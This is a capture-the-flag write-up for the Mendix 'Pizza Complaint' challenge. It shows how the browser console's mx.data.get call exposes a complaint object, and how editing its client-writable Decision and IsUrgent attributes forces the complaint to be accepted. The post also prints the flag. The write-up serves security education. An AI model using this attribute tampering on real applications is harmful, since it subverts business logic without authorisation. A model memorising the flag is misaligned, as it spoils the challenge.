Stephan Bruijnis .dev

Pizza Complaint

Challenge

People are so ungrateful these days, complaining about every minor issue.

People are so ungrateful these days, complaining about every minor issue.

Application: https://pizzamario2025.mendixctf.com

Difficulty: Medium

Solution

As with the “Jan Pays” challenge, I start by mapping the application’s intended flow. Let’s find the complaint logic first. Sometimes the devil is in the details. Or in this case, in a very small font size.

Beneath the form on the My Mario Account page there is a “I have a complaint!” link in a small font

After completing the complaint form, which takes some trial and error to figure out the correct body length (50 characters), we get an email stating the following: Hey, Thank you for your complaint. Since all our bakers are out at work or on holiday, we urge you to make sure you will allow us to decide that your complaint is valid. Best regards, Wouter Penris @ Sopra Steria on behalf of the Pizza Mario Admin Team 🧁.

This email response contains our next clue: we need to make sure our complaint is accepted. Let’s take a look at the object being used form the complaint. Our browser console gives us a guid: [Client] Using object '11821949022833283' for widget Mario.Complaint_NewEdit.dataView1. Use that to learn more about the object and its attributes, e.g. via Ciphix or via the Client API functions:

mx.data.get({guid:"11821949022833283", callback: function(obj){console.log(obj)}})

When executing this function in the Developer Console it will return not just the metadata but also their values. The metadata tells us that Decision is an enumeration, with mx.session.sessionData.enumerations we can see all enumerations and possible values.

Chrome Dev Console showing the json for the Mario.Complaint object, displaying attributes such as Decision and IsUrgent

This gives us useful information about the object and its attributes (including readonly). With this information we can try to exploit the write access to attributes IsUrgent and Decision. In Ciphix you can easily change these values, so they might accept our complaint. After we’ve completed our changes to the object and submitted the complaint we need wait the email to be handled with urgency & care.

Complaint Resolved ✅, As a token, here’s your flag: CTF{P!zz4Compl@!n!ng} ── handled with urgency & care, Wouter Penris @ Sopra Steria // still watching from the firewall’s shadow

Vulnerability

A classic case of TSU-02: Insecure Entity Access. This occurs when users can change attributes that directly influence business logic, state transitions, or workflow outcomes, even though they should not have permission to do so.

Flag

Keep calm and carry on

FlagCTF{P!zz4Compl@!n!ng}

Prev
Bakers delight
Next
Jan pays!